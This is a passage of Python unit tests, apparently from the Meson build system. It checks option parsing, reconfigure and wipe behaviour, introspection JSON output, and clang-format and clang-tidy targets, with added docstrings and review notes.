    # Should warn on unknown options
    out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
    self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
    self.wipe()

    # Should fail on malformed option
    with self.assertRaises(subprocess.CalledProcessError) as cm:
        self.init(testdir, extra_args=['-Dfoo'])
        self.assertNotEqual(0, cm.exception.returncode)
        self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
    self.init(testdir)
    with self.assertRaises(subprocess.CalledProcessError) as cm:
        self.setconf('-Dfoo')
        self.assertNotEqual(0, cm.exception.returncode)
        self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
    self.wipe()

    # It is not an error to set wrong option for unknown subprojects or
    # language because we don't have control on which one will be selected.
    self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
    self.wipe()

    # Test we can set subproject option
    self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
    self.wipe()

    # c_args value should be parsed with split_args
    self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
    self.setconf('-Dc_args="foo bar" one two')
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
    self.wipe()

    # '%' must survive option parsing unescaped
    self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
    obj = mesonbuild.coredata.load(self.builddir)
    self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
    self.wipe()

    # Setting a 2nd time the same option should override the first value
    try:
        self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
                                       '-Dbuildtype=plain', '-Dbuildtype=release',
                                       '-Db_sanitize=address', '-Db_sanitize=thread',
                                       '-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.builtins['bindir'].value, 'bar')
        self.assertEqual(obj.builtins['buildtype'].value, 'release')
        self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
        self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
        self.setconf(['--bindir=bar', '--bindir=foo',
                      '-Dbuildtype=release', '-Dbuildtype=plain',
                      '-Db_sanitize=thread', '-Db_sanitize=address',
                      '-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.builtins['bindir'].value, 'foo')
        self.assertEqual(obj.builtins['buildtype'].value, 'plain')
        self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
        self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
        self.wipe()
    except KeyError:
        # Ignore KeyError, it happens on CI for compilers that does not
        # support b_sanitize. We have to test with a base option because
        # they used to fail this test with Meson 0.46 an earlier versions.
        pass
def test_warning_level_0(self):
    """A project() default of warning_level=0 must stick and stay overridable."""
    testdir = os.path.join(self.common_test_dir, '214 warning level 0')

    def warning_level():
        # Read the value back from the pickled build configuration.
        return mesonbuild.coredata.load(self.builddir).builtins['warning_level'].value

    # Verify default values when passing no args
    self.init(testdir)
    self.assertEqual(warning_level(), '0')
    self.wipe()

    # verify we can override w/ --warnlevel
    self.init(testdir, extra_args=['--warnlevel=1'])
    self.assertEqual(warning_level(), '1')
    self.setconf('--warnlevel=0')
    self.assertEqual(warning_level(), '0')
    self.wipe()

    # verify we can override w/ -Dwarning_level
    self.init(testdir, extra_args=['-Dwarning_level=1'])
    self.assertEqual(warning_level(), '1')
    self.setconf('-Dwarning_level=0')
    self.assertEqual(warning_level(), '0')
    self.wipe()
def test_feature_check_usage_subprojects(self):
    """meson_version feature warnings must appear (only) where appropriate."""
    testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
    out = self.init(testdir)
    checks = [
        # Parent project warns correctly
        (True, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict"),
        # Subprojects warn correctly
        (True, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler"),
        (True, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler"),
        # Subproject has a new-enough meson_version, no warning
        (False, "WARNING: Project targeting.*Python"),
        # Ensure a summary is printed in the subproject and the outer project
        (True, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'"),
        (True, r"\| \* 0.44.0: {'disabler'}"),
        (True, "WARNING: Project specifies a minimum meson_version '>=0.45'"),
        (True, " * 0.47.0: {'dict'}"),
    ]
    for should_match, pattern in checks:
        if should_match:
            self.assertRegex(out, pattern)
        else:
            self.assertNotRegex(out, pattern)
def test_configure_file_warnings(self):
    """configure_file() must warn about missing vars, unused data and output clashes."""
    testdir = os.path.join(self.common_test_dir, "14 configure file")
    out = self.init(testdir)
    checks = [
        (True, "WARNING:.*'empty'.*config.h.in.*not present.*"),
        (True, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*"),
        (True, "WARNING:.*'empty'.*config.h.in.*not present.*"),
        (True, "WARNING:.*empty configuration_data.*test.py.in"),
        # Warnings for configuration files that are overwritten.
        (True, 'WARNING:.*"double_output.txt".*overwrites'),
        (True, 'WARNING:.*"subdir.double_output2.txt".*overwrites'),
        (False, "WARNING:.*no_write_conflict.txt.*overwrites"),
        (False, "WARNING:.*@BASENAME@.*overwrites"),
        (True, 'WARNING:.*"sameafterbasename".*overwrites'),
        # No warnings about empty configuration data objects passed to files
        # with substitutions
        (False, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in"),
        (False, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in"),
    ]
    for should_match, pattern in checks:
        matcher = self.assertRegex if should_match else self.assertNotRegex
        matcher(out, pattern)
    # Unsubstituted #mesondefine lines are copied through commented out
    with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
        self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
    with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
        self.assertEqual(f.read().strip(), b'')
    self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
    """meson must refuse to run without any directory argument and must work
    when invoked from inside an empty build directory.

    Fix: the meson.build is now written through a ``with open(...)`` context
    manager instead of a bare open/close pair, so the handle is closed even
    if the write raises.
    """
    with tempfile.TemporaryDirectory() as containing:
        with tempfile.TemporaryDirectory(dir=containing) as srcdir:
            mfile = os.path.join(srcdir, 'meson.build')
            with open(mfile, 'w') as of:
                of.write("project('foobar', 'c')\n")
            # No directory given at all: must fail with a helpful message
            pc = subprocess.run(self.setup_command,
                                cwd=srcdir,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.DEVNULL)
            self.assertIn(b'Must specify at least one directory name', pc.stdout)
            # Running from an (empty) build dir inside the source tree works
            with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
                subprocess.run(self.setup_command,
                               check=True,
                               cwd=builddir,
                               stdout=subprocess.DEVNULL,
                               stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
    """Return the introspected build options as a {name: value} mapping."""
    return {opt['name']: opt['value']
            for opt in self.introspect('--buildoptions')}
def test_buildtype_setting(self):
    """buildtype, debug and optimization options must track each other."""
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    self.init(testdir)

    def check(*expected):
        # Assert each (name, value) pair against the current option set.
        opts = self.get_opts_as_dict()
        for name, value in expected:
            self.assertEqual(opts[name], value)

    check(('buildtype', 'debug'), ('debug', True))
    self.setconf('-Ddebug=false')
    check(('debug', False), ('buildtype', 'plain'), ('optimization', '0'))
    # Setting optimizations to 3 should cause buildtype
    # to go to release mode.
    self.setconf('-Doptimization=3')
    check(('buildtype', 'release'), ('debug', False), ('optimization', '3'))
    # Going to debug build type should reset debugging
    # and optimization
    self.setconf('-Dbuildtype=debug')
    check(('buildtype', 'debug'), ('debug', True), ('optimization', '0'))
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
    """In a cross build, native deps must use the native pkg-config binary.

    Writes a cross file whose [binaries] pkgconfig points at a wrapper
    script, then configures twice (native dep first/last) to exercise both
    lookup orders.
    """
    testdir = os.path.join(self.unit_test_dir,
                           '46 native dep pkgconfig var')
    # delete=False: the file must outlive this block so self.init() can
    # read it as the cross file.  NOTE(review): it is never removed — a
    # temp-file leak per run; confirm whether cleanup is worth adding.
    with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
        crossfile.write(textwrap.dedent(
            '''[binaries]
            pkgconfig = r'{0}'

            [properties]

            [host_machine]
            system = 'linux'
            cpu_family = 'arm'
            cpu = 'armv7'
            endian = 'little'
            '''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
        crossfile.flush()
        self.meson_cross_file = crossfile.name
    env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
                                             'native_pkgconfig')}
    self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
    self.wipe()
    self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
    """The cross-file pkg_config_libdir property must steer cross pkg-config
    lookups while native lookups keep using PKG_CONFIG_LIBDIR."""
    testdir = os.path.join(self.unit_test_dir,
                           '46 native dep pkgconfig var')
    # delete=False: the file must outlive this block so self.init() can
    # read it as the cross file (see test_native_dep_pkgconfig).
    with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
        crossfile.write(textwrap.dedent(
            '''[binaries]
            pkgconfig = 'pkg-config'

            [properties]
            pkg_config_libdir = [r'{0}']

            [host_machine]
            system = 'linux'
            cpu_family = 'arm'
            cpu = 'armv7'
            endian = 'little'
            '''.format(os.path.join(testdir, 'cross_pkgconfig'))))
        crossfile.flush()
        self.meson_cross_file = crossfile.name
    env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
                                             'native_pkgconfig')}
    self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
    self.wipe()
    self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
    """Rewrite coredata.dat with a different stored version number.

    With change_minor the last version component is bumped by one (still
    compatible); otherwise the version is set to the ancient 0.47.0 to
    force a full reconfigure from scratch.
    """
    filename = os.path.join(self.privatedir, 'coredata.dat')
    with open(filename, 'rb') as f:
        obj = pickle.load(f)
    if change_minor:
        parts = mesonbuild.coredata.version.split('.')
        parts[2] = str(int(parts[2]) + 1)
        obj.version = '.'.join(parts[:3])
    else:
        obj.version = '0.47.0'
    with open(filename, 'wb') as f:
        pickle.dump(obj, f)
def test_reconfigure(self):
    """--reconfigure must regenerate from scratch while keeping earlier
    options; --wipe must clear the build dir and keep options too."""
    testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
    self.init(testdir, extra_args=['-Dopt1=val1'])
    self.setconf('-Dopt2=val2')
    self.__reconfigure()

    out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
    self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
    for pattern in ('opt1 val1', 'opt2 val2', 'opt3 val3', 'opt4 default4'):
        self.assertRegex(out, pattern)
    self.build()
    self.run_tests()

    # Create a file in builddir and verify wipe command removes it
    filename = os.path.join(self.builddir, 'something')
    with open(filename, 'w'):
        pass
    self.assertTrue(os.path.exists(filename))
    out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
    self.assertFalse(os.path.exists(filename))
    for pattern in ('opt1 val1', 'opt2 val2', 'opt3 val3', 'opt4 val4'):
        self.assertRegex(out, pattern)
    self.build()
    self.run_tests()
def test_wipe_from_builddir(self):
    """--wipe must work when meson is invoked from inside the build dir.

    Bug fix: the previous ``with Path(self.builddir):`` was a no-op —
    pathlib.Path's (undocumented, since-removed) context-manager protocol
    never changed the working directory, so the test did not actually run
    from the build dir.  Change directory explicitly and always restore it
    so later tests are unaffected.
    """
    testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
    self.init(testdir)
    self.__reconfigure()
    cwd = os.getcwd()
    os.chdir(self.builddir)
    try:
        self.init(testdir, extra_args=['--wipe'])
    finally:
        os.chdir(cwd)
def test_minor_version_does_not_reconfigure_wipe(self):
    """A compatible (bumped) coredata version must NOT trigger a from-scratch
    regeneration, and previously set options must survive."""
    testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
    self.init(testdir, extra_args=['-Dopt1=val1'])
    self.setconf('-Dopt2=val2')
    self.__reconfigure(change_minor=True)

    out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
    self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
    for pattern in ('opt1 val1', 'opt2 val2', 'opt3 val3', 'opt4 default4'):
        self.assertRegex(out, pattern)
    self.build()
    self.run_tests()
def test_target_construct_id_from_path(self):
    """Target ID generation must stay stable across releases.

    This id is stable but not guessable; the test exists to prevent
    unintentional changes of target ID generation.
    """
    cases = [
        (('some/obscure/subdir', 'target-id', '@suffix'),
         '5e002d3@@target-id@suffix'),
        (('subproject/foo/subdir/bar', 'target2-id', '@other'),
         '81d46d1@@target2-id@other'),
    ]
    for args, expected in cases:
        self.assertEqual(expected, Target.construct_id_from_path(*args))
def test_introspect_projectinfo_without_configured_build(self):
    """--projectinfo must work straight from a source tree (no build dir).

    Exercises three fixtures: a plain project, one with a meson_options.txt,
    and one with a subproject.
    """
    # Plain project: just a meson.build
    testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
    res = self.introspect_directory(testfile, '--projectinfo')
    self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
    self.assertEqual(res['version'], 'undefined')
    self.assertEqual(res['descriptive_name'], 'run command')
    self.assertEqual(res['subprojects'], [])

    # Project with a meson_options.txt
    testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
    res = self.introspect_directory(testfile, '--projectinfo')
    self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
    self.assertEqual(res['version'], 'undefined')
    self.assertEqual(res['descriptive_name'], 'options')
    self.assertEqual(res['subprojects'], [])

    # Project containing one subproject (with its own options file)
    testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
    res = self.introspect_directory(testfile, '--projectinfo')
    self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
    self.assertEqual(res['version'], 'undefined')
    self.assertEqual(res['descriptive_name'], 'suboptions')
    self.assertEqual(len(res['subprojects']), 1)
    # Normalize Windows path separators before comparing
    subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
    self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
    self.assertEqual(res['subprojects'][0]['name'], 'subproject')
    self.assertEqual(res['subprojects'][0]['version'], 'undefined')
    self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
    """--projectinfo on a configured build must list subprojects exactly."""
    testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
    self.init(testdir)
    res = self.introspect('--projectinfo')
    # Full expected document; assertDictEqual catches extra/missing keys too.
    expected = {
        'descriptive_name': 'proj',
        'version': 'undefined',
        'subproject_dir': 'subprojects',
        'subprojects': [
            {
                'descriptive_name': 'sub',
                'name': 'sub',
                'version': 'undefined'
            }
        ]
    }
    self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
    """--targets must report which subproject (if any) owns each target."""
    testdir = os.path.join(self.common_test_dir, '45 subproject')
    self.init(testdir)
    expected = {
        'sublib': 'sublib',
        'simpletest': 'sublib',
        'user': None
    }
    for entry in self.introspect('--targets'):
        self.assertEqual(entry['subproject'], expected[entry['name']])
def test_introspect_projectinfo_subproject_dir(self):
    """A custom subproject_dir must appear in --projectinfo (configured build)."""
    self.init(os.path.join(self.common_test_dir, '78 custom subproject dir'))
    info = self.introspect('--projectinfo')
    self.assertEqual(info['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
    """A custom subproject_dir must appear in --projectinfo (from source)."""
    mbuild = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
    info = self.introspect_directory(mbuild, '--projectinfo')
    self.assertEqual(info['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
    """The clang-format target must rewrite badly formatted sources in place.

    Copies the *_orig_* fixtures over the tracked file names, runs the
    target and compares against the *_expected_* fixtures.
    """
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
    testdir = os.path.join(self.unit_test_dir, '54 clang-format')
    testfile = os.path.join(testdir, 'prog.c')
    badfile = os.path.join(testdir, 'prog_orig_c')
    goodfile = os.path.join(testdir, 'prog_expected_c')
    testheader = os.path.join(testdir, 'header.h')
    badheader = os.path.join(testdir, 'header_orig_h')
    goodheader = os.path.join(testdir, 'header_expected_h')
    try:
        # Seed the source tree with the unformatted variants
        shutil.copyfile(badfile, testfile)
        shutil.copyfile(badheader, testheader)
        self.init(testdir)
        # Sanity: both files start out differing from the expected output
        self.assertNotEqual(Path(testfile).read_text(),
                            Path(goodfile).read_text())
        self.assertNotEqual(Path(testheader).read_text(),
                            Path(goodheader).read_text())
        self.run_target('clang-format')
        # NOTE(review): only the header is verified after formatting;
        # prog.c is never compared against prog_expected_c — confirm
        # whether that omission is intentional.
        self.assertEqual(Path(testheader).read_text(),
                         Path(goodheader).read_text())
    finally:
        # Remove the copied-in files so the source tree stays pristine
        if os.path.exists(testfile):
            os.unlink(testfile)
        if os.path.exists(testheader):
            os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
    """The clang-tidy target must surface diagnostics for known-bad code."""
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
    if shutil.which('c++') is None:
        raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
    if is_osx():
        raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
    testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
    self.init(testdir, override_envvars={'CXX': 'c++'})
    output = self.run_target('clang-tidy')
    # The fixture contains a deliberate defect at this exact location
    self.assertIn('cttest.cpp:4:20', output)
def test_identity_cross(self):
    """A cross file describing the build machine itself must still make the
    next configuration count as a cross build."""
    testdir = os.path.join(self.unit_test_dir, '71 cross')
    # Do a build to generate a cross file where the host is this target
    self.init(testdir, extra_args=['-Dgenerate=true'])
    crossfile = os.path.join(self.builddir, "crossfile")
    self.assertTrue(os.path.exists(crossfile))
    self.meson_cross_file = crossfile
    # Now verify that this is detected as cross
    self.new_builddir()
    self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
    """--buildoptions read from source must equal the configured-build result."""
    testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
    testfile = os.path.join(testdir, 'meson.build')
    from_source = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
    self.init(testdir, default_args=False)
    from_build = self.introspect('--buildoptions')
    self.maxDiff = None
    self.assertListEqual(from_source, from_build)
def test_meson_configure_from_source_does_not_crash(self):
    """`meson configure <srcdir>` (no build dir) must not throw."""
    srcdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
    self._run(self.mconf_command + [srcdir])
def test_introspect_json_dump(self):
    """Validate the schema of every intro-*.json written into meson-info.

    Loads all root documents, then checks key presence and value types for
    tests/benchmarks, buildoptions (including per-option-type extra keys),
    buildsystem files, dependencies, projectinfo and targets against the
    '57 introspection' fixture.
    """
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    self.init(testdir)
    infodir = os.path.join(self.builddir, 'meson-info')
    self.assertPathExists(infodir)

    def assertKeyTypes(key_type_list, obj):
        # Each entry is (key, expected_type); key must exist and match.
        for i in key_type_list:
            self.assertIn(i[0], obj)
            self.assertIsInstance(obj[i[0]], i[1])

    # Expected root documents and their JSON top-level types
    root_keylist = [
        ('benchmarks', list),
        ('buildoptions', list),
        ('buildsystem_files', list),
        ('dependencies', list),
        ('installed', dict),
        ('projectinfo', dict),
        ('targets', list),
        ('tests', list),
    ]
    # Per-entry schemas
    test_keylist = [
        ('cmd', list),
        ('env', dict),
        ('name', str),
        ('timeout', int),
        ('suite', list),
        ('is_parallel', bool),
        ('protocol', str),
    ]
    buildoptions_keylist = [
        ('name', str),
        ('section', str),
        ('type', str),
        ('description', str),
        ('machine', str),
    ]
    # (option type, value type, extra keys required for that type)
    buildoptions_typelist = [
        ('combo', str, [('choices', list)]),
        ('string', str, []),
        ('boolean', bool, []),
        ('integer', int, []),
        ('array', list, []),
    ]
    buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
    buildoptions_machines = ['any', 'build', 'host']
    dependencies_typelist = [
        ('name', str),
        ('version', str),
        ('compile_args', list),
        ('link_args', list),
    ]
    targets_typelist = [
        ('name', str),
        ('id', str),
        ('type', str),
        ('defined_in', str),
        ('filename', list),
        ('build_by_default', bool),
        ('target_sources', list),
        ('installed', bool),
    ]
    targets_sources_typelist = [
        ('language', str),
        ('compiler', list),
        ('parameters', list),
        ('sources', list),
        ('generated_sources', list),
    ]

    # First load all files
    res = {}
    for i in root_keylist:
        curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
        self.assertPathExists(curr)
        with open(curr, 'r') as fp:
            res[i[0]] = json.load(fp)
    assertKeyTypes(root_keylist, res)

    # Check Tests and benchmarks
    tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
    for i in res['benchmarks'] + res['tests']:
        assertKeyTypes(test_keylist, i)
        if i['name'] in tests_to_find:
            tests_to_find.remove(i['name'])
    self.assertListEqual(tests_to_find, [])

    # Check buildoptions
    buildopts_to_find = {'cpp_std': 'c++11'}
    for i in res['buildoptions']:
        assertKeyTypes(buildoptions_keylist, i)
        valid_type = False
        for j in buildoptions_typelist:
            if i['type'] == j[0]:
                self.assertIsInstance(i['value'], j[1])
                assertKeyTypes(j[2], i)
                valid_type = True
                break
        self.assertIn(i['section'], buildoptions_sections)
        self.assertIn(i['machine'], buildoptions_machines)
        self.assertTrue(valid_type)
        if i['name'] in buildopts_to_find:
            self.assertEqual(i['value'], buildopts_to_find[i['name']])
            buildopts_to_find.pop(i['name'], None)
    self.assertDictEqual(buildopts_to_find, {})

    # Check buildsystem_files
    bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
    bs_files = [os.path.join(testdir, x) for x in bs_files]
    self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))

    # Check dependencies
    dependencies_to_find = ['threads']
    for i in res['dependencies']:
        assertKeyTypes(dependencies_typelist, i)
        if i['name'] in dependencies_to_find:
            dependencies_to_find.remove(i['name'])
    self.assertListEqual(dependencies_to_find, [])

    # Check projectinfo
    self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})

    # Check targets
    targets_to_find = {
        'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
        'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
        'test1': ('executable', True, True, 'meson.build'),
        'test2': ('executable', True, False, 'meson.build'),
        'test3': ('executable', True, False, 'meson.build'),
    }
    for i in res['targets']:
        assertKeyTypes(targets_typelist, i)
        if i['name'] in targets_to_find:
            tgt = targets_to_find[i['name']]
            self.assertEqual(i['type'], tgt[0])
            self.assertEqual(i['build_by_default'], tgt[1])
            self.assertEqual(i['installed'], tgt[2])
            self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
            targets_to_find.pop(i['name'], None)
        for j in i['target_sources']:
            assertKeyTypes(targets_sources_typelist, j)
    self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
    """`introspect --all` must equal the union of the intro-*.json files."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    self.init(testdir)
    res_all = self.introspect('--all')
    sections = [
        'benchmarks',
        'buildoptions',
        'buildsystem_files',
        'dependencies',
        'installed',
        'projectinfo',
        'targets',
        'tests',
    ]
    infodir = os.path.join(self.builddir, 'meson-info')
    self.assertPathExists(infodir)
    res_file = {}
    for section in sections:
        path = os.path.join(infodir, 'intro-{}.json'.format(section))
        self.assertPathExists(path)
        with open(path, 'r') as fp:
            res_file[section] = json.load(fp)
    self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
    """meson-info.json must exist and carry the expected top-level keys."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
    self.init(testdir)
    self.assertPathExists(introfile)
    with open(introfile, 'r') as fp:
        info = json.load(fp)
    for key in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
        self.assertIn(key, info)
    self.assertEqual(info['error'], False)
    self.assertEqual(info['build_files_updated'], True)
def test_introspect_config_update(self):
    """setconf must rewrite intro-buildoptions.json to reflect new values."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
    self.init(testdir)
    self.assertPathExists(introfile)
    with open(introfile, 'r') as fp:
        res1 = json.load(fp)

    self.setconf('-Dcpp_std=c++14')
    self.setconf('-Dbuildtype=release')

    # Values we expect setconf to have changed (buildtype=release also
    # implies optimization=3 and debug=False).
    new_values = {
        'cpp_std': 'c++14',
        'build.cpp_std': 'c++14',
        'buildtype': 'release',
        'optimization': '3',
        'debug': False,
    }
    for idx, opt in enumerate(res1):
        if opt['name'] in new_values:
            res1[idx]['value'] = new_values[opt['name']]

    with open(introfile, 'r') as fp:
        res2 = json.load(fp)
    self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
    """--targets read from source must match the configured-build intro file,
    modulo fields that only exist once a backend has run."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    testfile = os.path.join(testdir, 'meson.build')
    introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
    self.init(testdir)
    self.assertPathExists(introfile)
    with open(introfile, 'r') as fp:
        res_wb = json.load(fp)

    res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)

    # Account for differences in output
    for i in res_wb:
        # Build-dir paths become relative; install data does not exist yet
        i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
        if 'install_filename' in i:
            del i['install_filename']

        # Without a configured build no compiler is known, so the source-only
        # introspection collapses everything into one 'unknown' entry
        sources = []
        for j in i['target_sources']:
            sources += j['sources']
        i['target_sources'] = [{
            'language': 'unknown',
            'compiler': [],
            'parameters': [],
            'sources': sources,
            'generated_sources': []
        }]

    self.maxDiff = None
    self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
    """--scan-dependencies from source must list every dependency() call with
    its required/version/fallback/conditional metadata."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    testfile = os.path.join(testdir, 'meson.build')
    res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
    # Mirrors the dependency() calls in the fixture meson.build, in order.
    expected = [
        {
            'name': 'threads',
            'required': True,
            'version': [],
            'has_fallback': False,
            'conditional': False
        },
        {
            'name': 'zlib',
            'required': False,
            'version': [],
            'has_fallback': False,
            'conditional': False
        },
        {
            'name': 'bugDep1',
            'required': True,
            'version': [],
            'has_fallback': False,
            'conditional': False
        },
        {
            'name': 'somethingthatdoesnotexist',
            'required': True,
            'version': ['>=1.2.3'],
            'has_fallback': False,
            'conditional': True
        },
        {
            'name': 'look_i_have_a_fallback',
            'required': True,
            'version': ['>=1.0.0', '<=99.9.9'],
            'has_fallback': True,
            'conditional': True
        }
    ]
    self.maxDiff = None
    self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
    """Smoke test: `meson unstable-coredata` must not raise."""
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    self.init(testdir)
    # just test that the command does not fail (e.g. because it throws an exception)
    cmd = [*self.meson_command, 'unstable-coredata', self.builddir]
    self._run(cmd)
@skip_if_no_cmake
def test_cmake_prefix_path(self):
    """CMake dependency lookup must honour -Dcmake_prefix_path."""
    testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
    prefix = os.path.join(testdir, 'prefix')
    self.init(testdir, extra_args=['-Dcmake_prefix_path=' + prefix])
@skip_if_no_cmake
def test_cmake_parser(self):
    """The CMake package-file parser must cope with the fixture's edge cases."""
    testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
    prefix = os.path.join(testdir, 'prefix')
    self.init(testdir, extra_args=['-Dcmake_prefix_path=' + prefix])
def test_alias_target(self):
    """alias_target() outputs must only be built when the alias is invoked."""
    if self.backend is Backend.vs:
        # FIXME: This unit test is broken with vs backend, needs investigation
        raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
    testdir = os.path.join(self.unit_test_dir, '66 alias target')
    self.init(testdir)
    self.build()
    outputs = [os.path.join(self.builddir, 'prog' + exe_suffix),
               os.path.join(self.builddir, 'hello.txt')]
    # A default build must not produce the alias' dependencies...
    for path in outputs:
        self.assertPathDoesNotExist(path)
    # ...but invoking the alias must produce all of them.
    self.run_target('build-all')
    for path in outputs:
        self.assertPathExists(path)
def test_configure(self):
